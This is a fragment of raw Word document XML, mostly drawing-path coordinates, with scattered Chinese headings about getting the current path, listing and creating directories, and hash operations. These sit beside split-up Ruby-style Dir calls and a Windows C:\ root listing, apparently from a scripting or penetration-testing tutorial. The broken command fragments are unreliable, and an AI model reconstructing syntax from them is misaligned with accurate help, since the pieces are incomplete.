        <v:shape style="position:absolute;left:2070;top:11450;width:130;height:250" coordorigin="2070,11450" coordsize="130,250" path="m2095,11460l2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2095,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2096,11460,2097,11460,2097,11460,2097,11460,2097,11460,2097,11460,2098,11460,2098,11460,2098,11460,2098,11460,2099,11460,2099,11460,2099,11460,2100,11460,2100,11460,2100,11460,2101,11460,2101,11460,2102,11460,2102,11460,2102,11460,2103,11460,2103,11460,2104,11460,2105,11460,2105,11460,2106,11460,2106,11460,2107,11460,2108,11460,2108,11460,2109,11460,2110,11460,2110,11460,2111,11460,2112,11460,2113,11460,2114,11460,2115,11460,2116,11460,2116,11460,2117,11460,2118,11460,2119,11460,2121,11460,2122,11460,2123,11460,2124,11460,2125,11460,2126,11460,2128,11460,2129,11460,2130,11460,2132,11460,2133,11460,2134,11460,2136,11460,2137,11460,2139,11460,2140,11460,2142,11460,2144,11460,2145,11460,2147,11460,2149,11460,2151,11460,2152,11460,2154,11460,2156,11460,2158,11460,2160,11460,2162,11460,2164,11460,2166,11460,2168,11460,2171,11460,2173,11460,2175,11460,2178,11460,2180,11460,2182,11460,2185,11460,2187,11460,2190,11460,2192,11460,2195,11460,2198,11460,2201,11460,2203,11460,2206,11460,2209,11460,2212,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11460,2215,11461,2215,11461,2215,11461,2215,11461,2215,11461,2215,11461,2215,11462,2215,11462,2215,11462,2215,11462,2215,11463,2215,11463,2215,11463,2215,11464,2215,11464,2215,11465,2215,11465,2215,11466,2215,11466,2215,11467,2215,11467,2215,11468,2215,11469,2215,11469,2215,11470,2215,11471,2215,11472,2215,11473,2215,11474,2215,11475,2215,11475,2215,11477,2215,11478,2215,11479,2215,11480,2215,11481,2215,11482,2215,11484,2215,11485,2215,11486,2215,11488,2215,11489,2215,11491,2215,11492,2215,11494,2215,11496,2215,11498,2215,11499,2215,11501,2215,11503,2215,11505,2215,11507,2215,11510,2215,11512,2215,11514,2215,11516,2215,11519,2215,11521,2215,11524,2215,11526,2215,11529,2215,11532,2215,11534,2215,11537,2215,11540,2215,11543,2215,11546,2215,11550,2215,11553,2215,11556,2215,11559,2215,11563,2215,11567,2215,11570,2215,11574,2215,11578,2215,11582,2215,11586,2215,11590,2215,11594,2215,11598,2215,11602,2215,11607,2215,11611,2215,11616,2215,11620,2215,11625,2215,11630,2215,11635,2215,11640,2215,11645,2215,11650,2215,11656,2215,11661,2215,11667,2215,11672,2215,11678,2215,11684,2215,11690,2215,11696,2215,11702,2215,11709,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2215,11715,2214,11715,2214,11715,2214,11715,2214,11715,2214,11715,2214,11715,2214,11715,2214,11715,2213,11715,2213,11715,2213,11715,2213,11715,2213,11715,2212,11715,2212,11715,2212,11715,2212,11715,2211,11715,2211,11715,2211,11715,2210,11715,2210,11715,2209,11715,2209,11715,2209,11715,2208,11715,2208,11715,2207,11715,2207,11715,2206,11715,2206,11715,2205,11715,2205,11715,2204,11715,2203,11715,2203,11715,2202,11715,2201,11715,2200,11715,2200,11715,2199,11715,2198,11715,2197,11715,2196,11715,2196,11715,2195,11715,2194,11715,2193,11715,2192,11715,2191,11715,2190,11715,2189,11715,2187,11715,2186,11715,2185,11715,2184,11715,2183,11715,2181,11715,2180,11715,2179,11715,2177,11715,2176,11715,2174,11715,2173,11715,2171,11715,2170,11715,2168,11715,2167,11715,2165,11715,2163,11715,2161,11715,2160,11715,2158,11715,2156,11715,2154,11715,2152,11715,2150,11715,2148,11715,2146,11715,2144,11715,2142,11715,2140,11715,2137,11715,2135,11715,2133,11715,2130,11715,2128,11715,2125,11715,2123,11715,2120,11715,2118,11715,2115,11715,2112,11715,2110,11715,2107,11715,2104,11715,2101,11715,2098,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11715,2095,11714,2095,11714,2095,11714,2095,11714,2095,11714,2095,11714,2095,11714,2095,11714,2095,11713,2095,11713,2095,11713,2095,11713,2095,11712,2095,11712,2095,11712,2095,11711,2095,11711,2095,11710,2095,11710,2095,11709,2095,11709,2095,11708,2095,11708,2095,11707,2095,11707,2095,11706,2095,11705,2095,11704,2095,11704,2095,11703,2095,11702,2095,11701,2095,11700,2095,11699,2095,11698,2095,11697,2095,11696,2095,11695,2095,11694,2095,11692,2095,11691,2095,11690,2095,11688,2095,11687,2095,11685,2095,11684,2095,11682,2095,11681,2095,11679,2095,11677,2095,11675,2095,11673,2095,11671,2095,11669,2095,11667,2095,11665,2095,11663,2095,11661,2095,11658,2095,11656,2095,11654,2095,11651,2095,11648,2095,11646,2095,11643,2095,11640,2095,11637,2095,11634,2095,11631,2095,11628,2095,11625,2095,11622,2095,11619,2095,11615,2095,11612,2095,11608,2095,11605,2095,11601,2095,11597,2095,11593,2095,11589,2095,11585,2095,11581,2095,11577,2095,11572,2095,11568,2095,11564,2095,11559,2095,11554,2095,11549,2095,11545,2095,11540,2095,11535,2095,11529,2095,11524,2095,11519,2095,11513,2095,11508,2095,11502,2095,11496,2095,11491,2095,11485,2095,11479,2095,11472,2095,11466,2095,11460e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:626.400pt;width:368.399pt;height:109.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId2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9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快</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>速获取当前绝对路径：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fs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dir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pwd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"C:\\Documents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Settings\\Administrator\\\xE6\xA1\x8C\xE9\x9D\xA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1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="34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目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>录相关操作：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dir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chdir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"c:\\"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1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14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="1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80053"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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dir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entries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="129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"ADFS"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"AUTOEXEC.BAT"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"boot.ini"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"bootfont.bin"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"CONFIG.SYS"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"Documents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Settings"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"Inetpub"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"IO.SYS"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"MSDOS.SYS"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"NTDETECT.CO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M"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"ntldr"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"pagefile.sys"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"Program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Files"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"Program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Files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(x86)"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"REC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YCLER"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"System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Volume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Information"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"WINDOWS"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"wmpub"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]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="74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建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>立文件夹：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dir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mkdir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"Micropoor"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353" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="13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80053"/>
          <w:spacing w:val="17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3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hash操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作：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49.500pt;width:0.500pt;height:399.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,990" coordsize="10,7990">
        <v:shape style="position:absolute;left:10390;top:990;width:10;height:7990" coordorigin="10390,990" coordsize="10,7990" path="m10402,1000l10402,1000,10402,1000,10402,1000,10402,1000,10402,1000,10402,1000,10402,1001,10402,1001,10402,1002,10402,1003,10402,1004,10402,1006,10402,1008,10402,1010,10402,1013,10402,1015,10402,1019,10402,1023,10402,1027,10402,1032,10402,1037,10402,1043,10402,1050,10402,1057,10402,1065,10402,1074,10402,1083,10402,1093,10402,1104,10402,1115,10402,1127,10402,1141,10402,1155,10402,1170,10402,1186,10402,1203,10402,1221,10402,1239,10402,1259,10402,1281,10402,1303,10402,1326,10402,1351,10402,1376,10402,1403,10402,1431,10402,1461,10402,1491,10402,1523,10402,1557,10402,1592,10402,1628,10402,1666,10402,1705,10402,1746,10402,1788,10402,1832,10402,1877,10402,1924,10402,1973,10402,2023,10402,2075,10402,2129,10402,2184,10402,2242,10402,2301,10402,2362,10402,2424,10402,2489,10402,2556,10402,2625,10402,2695,10402,2768,10402,2843,10402,2919,10402,2998,10402,3079,10402,3162,10402,3248,10402,3335,10402,3425,10402,3517,10402,3612,10402,3709,10402,3808,10402,3909,10402,4013,10402,4119,10402,4228,10402,4340,10402,4453,10402,4570,10402,4689,10402,4810,10402,4935,10402,5062,10402,5191,10402,5324,10402,5459,10402,5597,10402,5737,10402,5881,10402,6027,10402,6177,10402,6329,10402,6484,10402,6642,10402,6804,10402,6968,10402,7135,10402,7306,10402,7479,10402,7656,10402,7836,10402,8019,10402,8205,10402,8395,10402,8588,10402,8784,10402,8984e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:990;width:8990;height:390" coordorigin="1490,99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4,10484,1004,10484,1005,10484,1005,10484,1006,10484,1006,10484,1007,10484,1008,10484,1009,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1014,10484,1015,10484,1017,10484,1018,10484,1019,10484,1021,10484,1022,10484,1024,10484,1025,10484,1027,10484,1028,10484,1030,10484,1032,10484,1034,10484,1036,10484,1038,10484,1040,10484,1042,10484,1045,10484,1047,10484,1050,10484,1052,10484,1055,10484,1057,10484,1060,10484,1063,10484,1066,10484,1069,10484,1072,10484,1076,10484,1079,10484,1082,10484,1086,10484,1090,10484,1093,10484,1097,10484,1101,10484,1105,10484,1109,10484,1114,10484,1118,10484,1123,10484,1127,10484,1132,10484,1137,10484,1142,10484,1147,10484,1152,10484,1157,10484,1163,10484,1168,10484,1174,10484,1180,10484,1186,10484,1192,10484,1198,10484,1204,10484,1211,10484,1217,10484,1224,10484,1231,10484,1238,10484,1245,10484,1253,10484,1260,10484,1268,10484,1275,10484,1283,10484,1291,10484,1299,10484,1308,10484,1316,10484,1325,10484,1334,10484,1343,10484,1352,10484,1361,10484,1370,10484,1380,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10483,1390,10482,1390,10482,1390,10480,1390,10479,1390,10477,1390,10475,1390,10473,1390,10470,1390,10466,1390,10462,1390,10458,1390,10453,1390,10448,1390,10442,1390,10435,1390,10428,1390,10419,1390,10411,1390,10401,1390,10391,1390,10379,1390,10367,1390,10354,1390,10340,1390,10326,1390,10310,1390,10293,1390,10275,1390,10256,1390,10236,1390,10215,1390,10192,1390,10168,1390,10143,1390,10117,1390,10090,1390,10061,1390,10031,1390,9999,1390,9966,1390,9931,1390,9895,1390,9858,1390,9819,1390,9778,1390,9735,1390,9691,1390,9646,1390,9598,1390,9549,1390,9498,1390,9445,1390,9391,1390,9334,1390,9275,1390,9215,1390,9153,1390,9088,1390,9022,1390,8953,1390,8883,1390,8810,1390,8735,1390,8658,1390,8578,1390,8497,1390,8413,1390,8326,1390,8238,1390,8146,1390,8053,1390,7957,1390,7859,1390,7758,1390,7654,1390,7548,1390,7439,1390,7328,1390,7214,1390,7097,1390,6977,1390,6855,1390,6730,1390,6602,1390,6471,1390,6337,1390,6201,1390,6061,1390,5918,1390,5773,1390,5624,1390,5472,1390,5317,1390,5159,1390,4997,1390,4833,1390,4665,1390,4494,1390,4319,1390,4141,1390,3960,1390,3776,1390,3587,1390,3396,1390,3201,1390,3002,1390,2800,1390,2594,1390,2385,1390,2172,1390,1955,1390,1734,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1389,1510,1388,1510,1388,1510,1388,1510,1388,1510,1387,1510,1387,1510,1386,1510,1386,1510,1386,1510,1385,1510,1385,1510,1384,1510,1383,1510,1383,1510,1382,1510,1381,1510,1381,1510,1380,1510,1379,1510,1378,1510,1377,1510,1376,1510,1375,1510,1374,1510,1373,1510,1371,1510,1370,1510,1369,1510,1367,1510,1366,1510,1364,1510,1362,1510,1361,1510,1359,1510,1357,1510,1355,1510,1353,1510,1351,1510,1349,1510,1347,1510,1345,1510,1342,1510,1340,1510,1337,1510,1335,1510,1332,1510,1329,1510,1326,1510,1323,1510,1320,1510,1317,1510,1314,1510,1310,1510,1307,1510,1303,1510,1300,1510,1296,1510,1292,1510,1288,1510,1284,1510,1280,1510,1276,1510,1271,1510,1267,1510,1262,1510,1257,1510,1252,1510,1247,1510,1242,1510,1237,1510,1232,1510,1226,1510,1221,1510,1215,1510,1209,1510,1203,1510,1197,1510,1191,1510,1185,1510,1178,1510,1172,1510,1165,1510,1158,1510,1151,1510,1144,1510,1137,1510,1129,1510,1122,1510,1114,1510,1106,1510,1098,1510,1090,1510,1082,1510,1073,1510,1064,1510,1056,1510,1047,1510,1038,1510,1028,1510,1019,1510,1009,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:48.600pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId22" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:68.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1370" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1370;width:8990;height:370" coordorigin="1490,1370" coordsize="8990,370" path="m1510,1390l1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1510,1390,1511,1390,1512,1390,1512,1390,1514,1390,1515,1390,1517,1390,1519,1390,1521,1390,1524,1390,1528,1390,1532,1390,1536,1390,1541,1390,1546,1390,1552,1390,1559,1390,1566,1390,1575,1390,1583,1390,1593,1390,1603,1390,1615,1390,1627,1390,1640,1390,1654,1390,1668,1390,1684,1390,1701,1390,1719,1390,1738,1390,1758,1390,1780,1390,1802,1390,1826,1390,1851,1390,1877,1390,1904,1390,1933,1390,1963,1390,1995,1390,2028,1390,2063,1390,2099,1390,2136,1390,2175,1390,2216,1390,2259,1390,2303,1390,2348,1390,2396,1390,2445,1390,2496,1390,2549,1390,2604,1390,2660,1390,2719,1390,2779,1390,2841,1390,2906,1390,2972,1390,3041,1390,3112,1390,3184,1390,3259,1390,3336,1390,3416,1390,3498,1390,3582,1390,3668,1390,3757,1390,3848,1390,3941,1390,4037,1390,4136,1390,4236,1390,4340,1390,4446,1390,4555,1390,4666,1390,4780,1390,4897,1390,5017,1390,5139,1390,5264,1390,5392,1390,5523,1390,5657,1390,5793,1390,5933,1390,6076,1390,6222,1390,6370,1390,6522,1390,6677,1390,6835,1390,6997,1390,7161,1390,7329,1390,7500,1390,7675,1390,7853,1390,8034,1390,8219,1390,8407,1390,8598,1390,8793,1390,8992,1390,9194,1390,9400,1390,9609,1390,9823,1390,10039,1390,10260,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1390,10484,1391,10484,1391,10484,1391,10484,1391,10484,1391,10484,1392,10484,1392,10484,1392,10484,1393,10484,1393,10484,1393,10484,1394,10484,1394,10484,1395,10484,1395,10484,1396,10484,1397,10484,1397,10484,1398,10484,1399,10484,1400,10484,1401,10484,1401,10484,1402,10484,1403,10484,1404,10484,1406,10484,1407,10484,1408,10484,1409,10484,1411,10484,1412,10484,1413,10484,1415,10484,1416,10484,1418,10484,1420,10484,1422,10484,1423,10484,1425,10484,1427,10484,1429,10484,1431,10484,1434,10484,1436,10484,1438,10484,1441,10484,1443,10484,1446,10484,1448,10484,1451,10484,1454,10484,1457,10484,1460,10484,1463,10484,1466,10484,1469,10484,1473,10484,1476,10484,1480,10484,1484,10484,1487,10484,1491,10484,1495,10484,1499,10484,1503,10484,1508,10484,1512,10484,1516,10484,1521,10484,1526,10484,1530,10484,1535,10484,1540,10484,1546,10484,1551,10484,1556,10484,1562,10484,1567,10484,1573,10484,1579,10484,1585,10484,1591,10484,1597,10484,1603,10484,1610,10484,1617,10484,1623,10484,1630,10484,1637,10484,1644,10484,1652,10484,1659,10484,1666,10484,1674,10484,1682,10484,1690,10484,1698,10484,1706,10484,1715,10484,1723,10484,1732,10484,1741,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10483,1750,10482,1750,10482,1750,10480,1750,10479,1750,10477,1750,10475,1750,10473,1750,10470,1750,10466,1750,10462,1750,10458,1750,10453,1750,10448,1750,10442,1750,10435,1750,10428,1750,10419,1750,10411,1750,10401,1750,10391,1750,10379,1750,10367,1750,10354,1750,10340,1750,10326,1750,10310,1750,10293,1750,10275,1750,10256,1750,10236,1750,10215,1750,10192,1750,10168,1750,10143,1750,10117,1750,10090,1750,10061,1750,10031,1750,9999,1750,9966,1750,9931,1750,9895,1750,9858,1750,9819,1750,9778,1750,9735,1750,9691,1750,9646,1750,9598,1750,9549,1750,9498,1750,9445,1750,9391,1750,9334,1750,9275,1750,9215,1750,9153,1750,9088,1750,9022,1750,8953,1750,8883,1750,8810,1750,8735,1750,8658,1750,8578,1750,8497,1750,8413,1750,8326,1750,8238,1750,8146,1750,8053,1750,7957,1750,7859,1750,7758,1750,7654,1750,7548,1750,7439,1750,7328,1750,7214,1750,7097,1750,6977,1750,6855,1750,6730,1750,6602,1750,6471,1750,6337,1750,6201,1750,6061,1750,5918,1750,5773,1750,5624,1750,5472,1750,5317,1750,5159,1750,4997,1750,4833,1750,4665,1750,4494,1750,4319,1750,4141,1750,3960,1750,3776,1750,3587,1750,3396,1750,3201,1750,3002,1750,2800,1750,2594,1750,2385,1750,2172,1750,1955,1750,1734,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1749,1510,1749,1510,1749,1510,1749,1510,1749,1510,1749,1510,1748,1510,1748,1510,1748,1510,1748,1510,1747,1510,1747,1510,1747,1510,1746,1510,1746,1510,1745,1510,1745,1510,1744,1510,1744,1510,1743,1510,1742,1510,1741,1510,1741,1510,1740,1510,1739,1510,1738,1510,1737,1510,1736,1510,1735,1510,1734,1510,1733,1510,1732,1510,1730,1510,1729,1510,1728,1510,1726,1510,1725,1510,1723,1510,1722,1510,1720,1510,1718,1510,1716,1510,1714,1510,1712,1510,1710,1510,1708,1510,1706,1510,1704,1510,1701,1510,1699,1510,1696,1510,1694,1510,1691,1510,1688,1510,1686,1510,1683,1510,1680,1510,1677,1510,1673,1510,1670,1510,1667,1510,1663,1510,1660,1510,1656,1510,1652,1510,1648,1510,1645,1510,1640,1510,1636,1510,1632,1510,1628,1510,1623,1510,1619,1510,1614,1510,1609,1510,1604,1510,1599,1510,1594,1510,1589,1510,1583,1510,1578,1510,1572,1510,1567,1510,1561,1510,1555,1510,1549,1510,1542,1510,1536,1510,1530,1510,1523,1510,1516,1510,1509,1510,1502,1510,1495,1510,1488,1510,1481,1510,1473,1510,1465,1510,1458,1510,1450,1510,1441,1510,1433,1510,1425,1510,1416,1510,1408,1510,1399,1510,1390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90l1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1390,1517,1391,1517,1391,1517,1391,1517,1391,1517,1391,1517,1392,1517,1392,1517,1392,1517,1393,1517,1393,1517,1393,1517,1394,1517,1394,1517,1395,1517,1395,1517,1396,1517,1397,1517,1397,1517,1398,1517,1399,1517,1400,1517,1401,1517,1401,1517,1402,1517,1403,1517,1404,1517,1406,1517,1407,1517,1408,1517,1409,1517,1411,1517,1412,1517,1413,1517,1415,1517,1416,1517,1418,1517,1420,1517,1422,1517,1423,1517,1425,1517,1427,1517,1429,1517,1431,1517,1434,1517,1436,1517,1438,1517,1441,1517,1443,1517,1446,1517,1448,1517,1451,1517,1454,1517,1457,1517,1460,1517,1463,1517,1466,1517,1469,1517,1473,1517,1476,1517,1480,1517,1484,1517,1487,1517,1491,1517,1495,1517,1499,1517,1503,1517,1508,1517,1512,1517,1516,1517,1521,1517,1526,1517,1530,1517,1535,1517,1540,1517,1546,1517,1551,1517,1556,1517,1562,1517,1567,1517,1573,1517,1579,1517,1585,1517,1591,1517,1597,1517,1603,1517,1610,1517,1617,1517,1623,1517,1630,1517,1637,1517,1644,1517,1652,1517,1659,1517,1666,1517,1674,1517,1682,1517,1690,1517,1698,1517,1706,1517,1715,1517,1723,1517,1732,1517,1741,1517,1750e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:86.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1730" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1730;width:8990;height:390" coordorigin="1490,1730" coordsize="8990,390" path="m1510,1750l1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1511,1750,1512,1750,1512,1750,1514,1750,1515,1750,1517,1750,1519,1750,1521,1750,1524,1750,1528,1750,1532,1750,1536,1750,1541,1750,1546,1750,1552,1750,1559,1750,1566,1750,1575,1750,1583,1750,1593,1750,1603,1750,1615,1750,1627,1750,1640,1750,1654,1750,1668,1750,1684,1750,1701,1750,1719,1750,1738,1750,1758,1750,1780,1750,1802,1750,1826,1750,1851,1750,1877,1750,1904,1750,1933,1750,1963,1750,1995,1750,2028,1750,2063,1750,2099,1750,2136,1750,2175,1750,2216,1750,2259,1750,2303,1750,2348,1750,2396,1750,2445,1750,2496,1750,2549,1750,2604,1750,2660,1750,2719,1750,2779,1750,2841,1750,2906,1750,2972,1750,3041,1750,3112,1750,3184,1750,3259,1750,3336,1750,3416,1750,3498,1750,3582,1750,3668,1750,3757,1750,3848,1750,3941,1750,4037,1750,4136,1750,4236,1750,4340,1750,4446,1750,4555,1750,4666,1750,4780,1750,4897,1750,5017,1750,5139,1750,5264,1750,5392,1750,5523,1750,5657,1750,5793,1750,5933,1750,6076,1750,6222,1750,6370,1750,6522,1750,6677,1750,6835,1750,6997,1750,7161,1750,7329,1750,7500,1750,7675,1750,7853,1750,8034,1750,8219,1750,8407,1750,8598,1750,8793,1750,8992,1750,9194,1750,9400,1750,9609,1750,9823,1750,10039,1750,10260,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1751,10484,1751,10484,1751,10484,1751,10484,1751,10484,1752,10484,1752,10484,1752,10484,1753,10484,1753,10484,1753,10484,1754,10484,1754,10484,1755,10484,1755,10484,1756,10484,1757,10484,1757,10484,1758,10484,1759,10484,1759,10484,1760,10484,1761,10484,1762,10484,1763,10484,1764,10484,1765,10484,1766,10484,1768,10484,1769,10484,1770,10484,1772,10484,1773,10484,1775,10484,1776,10484,1778,10484,1779,10484,1781,10484,1783,10484,1785,10484,1787,10484,1789,10484,1791,10484,1793,10484,1796,10484,1798,10484,1800,10484,1803,10484,1806,10484,1808,10484,1811,10484,1814,10484,1817,10484,1820,10484,1823,10484,1826,10484,1830,10484,1833,10484,1836,10484,1840,10484,1844,10484,1848,10484,1852,10484,1856,10484,1860,10484,1864,10484,1868,10484,1873,10484,1877,10484,1882,10484,1887,10484,1891,10484,1896,10484,1902,10484,1907,10484,1912,10484,1918,10484,1923,10484,1929,10484,1935,10484,1941,10484,1947,10484,1953,10484,1959,10484,1966,10484,1973,10484,1979,10484,1986,10484,1993,10484,2000,10484,2008,10484,2015,10484,2023,10484,2030,10484,2038,10484,2046,10484,2054,10484,2063,10484,2071,10484,2080,10484,2088,10484,2097,10484,2106,10484,2116,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10484,2125,10483,2125,10482,2125,10482,2125,10480,2125,10479,2125,10477,2125,10475,2125,10473,2125,10470,2125,10466,2125,10462,2125,10458,2125,10453,2125,10448,2125,10442,2125,10435,2125,10428,2125,10419,2125,10411,2125,10401,2125,10391,2125,10379,2125,10367,2125,10354,2125,10340,2125,10326,2125,10310,2125,10293,2125,10275,2125,10256,2125,10236,2125,10215,2125,10192,2125,10168,2125,10143,2125,10117,2125,10090,2125,10061,2125,10031,2125,9999,2125,9966,2125,9931,2125,9895,2125,9858,2125,9819,2125,9778,2125,9735,2125,9691,2125,9646,2125,9598,2125,9549,2125,9498,2125,9445,2125,9391,2125,9334,2125,9275,2125,9215,2125,9153,2125,9088,2125,9022,2125,8953,2125,8883,2125,8810,2125,8735,2125,8658,2125,8578,2125,8497,2125,8413,2125,8326,2125,8238,2125,8146,2125,8053,2125,7957,2125,7859,2125,7758,2125,7654,2125,7548,2125,7439,2125,7328,2125,7214,2125,7097,2125,6977,2125,6855,2125,6730,2125,6602,2125,6471,2125,6337,2125,6201,2125,6061,2125,5918,2125,5773,2125,5624,2125,5472,2125,5317,2125,5159,2125,4997,2125,4833,2125,4665,2125,4494,2125,4319,2125,4141,2125,3960,2125,3776,2125,3587,2125,3396,2125,3201,2125,3002,2125,2800,2125,2594,2125,2385,2125,2172,2125,1955,2125,1734,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2125,1510,2124,1510,2124,1510,2124,1510,2124,1510,2124,1510,2124,1510,2123,1510,2123,1510,2123,1510,2122,1510,2122,1510,2122,1510,2121,1510,2121,1510,2120,1510,2120,1510,2119,1510,2118,1510,2118,1510,2117,1510,2116,1510,2116,1510,2115,1510,2114,1510,2113,1510,2112,1510,2111,1510,2110,1510,2109,1510,2107,1510,2106,1510,2105,1510,2103,1510,2102,1510,2100,1510,2099,1510,2097,1510,2096,1510,2094,1510,2092,1510,2090,1510,2088,1510,2086,1510,2084,1510,2082,1510,2079,1510,2077,1510,2075,1510,2072,1510,2069,1510,2067,1510,2064,1510,2061,1510,2058,1510,2055,1510,2052,1510,2049,1510,2045,1510,2042,1510,2038,1510,2035,1510,2031,1510,2027,1510,2023,1510,2019,1510,2015,1510,2011,1510,2007,1510,2002,1510,1998,1510,1993,1510,1988,1510,1983,1510,1978,1510,1973,1510,1968,1510,1963,1510,1957,1510,1952,1510,1946,1510,1940,1510,1934,1510,1928,1510,1922,1510,1916,1510,1909,1510,1902,1510,1896,1510,1889,1510,1882,1510,1875,1510,1867,1510,1860,1510,1852,1510,1845,1510,1837,1510,1829,1510,1821,1510,1812,1510,1804,1510,1795,1510,1786,1510,1778,1510,1768,1510,1759,1510,1750e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:86.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1730" coordsize="30,390">
